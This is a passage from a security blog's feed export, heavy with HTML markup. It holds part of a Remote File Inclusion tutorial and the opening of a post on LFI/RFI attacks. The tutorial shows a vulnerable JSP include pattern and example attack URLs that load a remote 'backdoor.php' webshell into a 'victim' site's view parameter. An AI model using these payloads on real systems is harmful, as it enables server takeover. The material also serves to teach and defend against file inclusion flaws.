all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&amp;lt;c:import url=”&amp;lt;=request.getParameter(“conf”)%&amp;gt;”&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Again,  If the input is not sanitized properly it can be used to include a  malicious file from a remote server. RFI is not a common vulnerability  at all but it is very dangerous when exploited. Now you must be  wondering how to exploit this vulnerability. Hold on, I will demonstrate  it with a real life example. We have a URL here,&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Example :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;http://www.victim.com/file.php?view=http://docs.mysite.com/backdoor.php&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Lets break things down&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;ol style=&quot;line-height: 1.5; outline: 0px; transition: all 0.3s ease;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;li style=&quot;background: 0px 0px; border: 0px; line-height: 1.5; margin: 5px 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;www.victim.com is the target website&lt;/li&gt;&lt;li style=&quot;background: 0px 0px; border: 0px; line-height: 1.5; margin: 5px 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;file.php is a webpage with the parameter view=&lt;/li&gt;&lt;li style=&quot;background: 0px 0px; border: 0px; line-height: 1.5; margin: 5px 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.&lt;/li&gt;&lt;/span&gt;&lt;/ol&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Take  a close look at view= , if it was including local files like  view=/files/animals.php we would have test for Local File Inclusion. But  as we can see its including files from docs.example.com which is a  different website, it means it loads files from other website which  means it may include any malicious file too. Enough theory! So here’s  the vulnerable parameter&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-oXEVDxTD-QI/WztxZmcsWeI/AAAAAAAAAm4/5KC6b5Y-C2k5Y6jXaAq8oKI7YgraJ-gogCLcBGAs/s1600/RFI%2BVuln.png&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;523&quot; data-original-width=&quot;1366&quot; height=&quot;244&quot; src=&quot;https://3.bp.blogspot.com/-oXEVDxTD-QI/WztxZmcsWeI/AAAAAAAAAm4/5KC6b5Y-C2k5Y6jXaAq8oKI7YgraJ-gogCLcBGAs/s640/RFI%2BVuln.png&quot; style=&quot;background: 0px 0px; border: 0px; max-width: 100%; outline: 0px; padding: 0px; position: relative; transition: all 0.3s ease; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Now I will try to load an image by submitting its URL like this&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Example :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;http://www.victim.com/file.php?view=https://javahaxor.org/backdoor.php&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-bjMOIU91iQM/Wzty1fMRSjI/AAAAAAAAAnE/gCenWBRYfO8go0-NLQ43CAT9x0pHsPaCwCLcBGAs/s1600/36555258_1602137773246653_3239163974142394368_n.png&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;809&quot; data-original-width=&quot;1407&quot; height=&quot;366&quot; src=&quot;https://3.bp.blogspot.com/-bjMOIU91iQM/Wzty1fMRSjI/AAAAAAAAAnE/gCenWBRYfO8go0-NLQ43CAT9x0pHsPaCwCLcBGAs/s640/36555258_1602137773246653_3239163974142394368_n.png&quot; style=&quot;background: 0px 0px; border: 0px; max-width: 100%; outline: 0px; padding: 0px; position: relative; transition: all 0.3s ease; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;See? How easy is that? With a webshell you can take over their website or even the whole server.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Also Read :&amp;nbsp;&lt;b style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://www.bandungdigitalsecurity.org/2018/07/file-inclusion-attack-lfirfi.html&quot; style=&quot;background: 0px 0px; border: 0px; color: #16a8e1; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;File Inclusion Attack&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/8736105316112492883/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/remote-file-inclusion-rfi-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8736105316112492883'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8736105316112492883'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/remote-file-inclusion-rfi-tutorial.html' title='Remote File Inclusion (RFI) Tutorial'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-pNG2Uj7tvHQ/Wzt6IBX63aI/AAAAAAAAAnQ/jYBd0nLuuQ8klxYYpgFcC_8j1a5WMaH2ACLcBGAs/s72-c/Remote%2BFile%2BInclusion.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-860177674517433288</id><published>2018-07-12T06:49:00.000-07:00</published><updated>2018-07-22T14:59:35.811-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="RCE"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>File Inclusion Attack (LFI/RFI)</title><content type='html'>&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: medium; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Local File Inclusion (LFI) and Remote File Inclusion (RFI)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-PzM5hUHQGS0/Wztu3xcI9RI/AAAAAAAAAmU/bl60VQazz4glLHTaK8zGzRF8RM11cqE4gCLcBGAs/s1600/File%2BInclusion.jpg&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;720&quot; data-original-width=&quot;1280&quot; height=&quot;360&quot; src=&quot;https://4.bp.blogspot.com/-PzM5hUHQGS0/Wztu3xcI9RI/AAAAAAAAAmU/bl60VQazz4glLHTaK8zGzRF8RM11cqE4gCLcBGAs/s640/File%2BInclusion.jpg&quot; style=&quot;background: 0px 0px; border: 0px; max-width: 100%; outline: 0px; padding: 0px; position: relative; transition: all 0.3s ease; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; 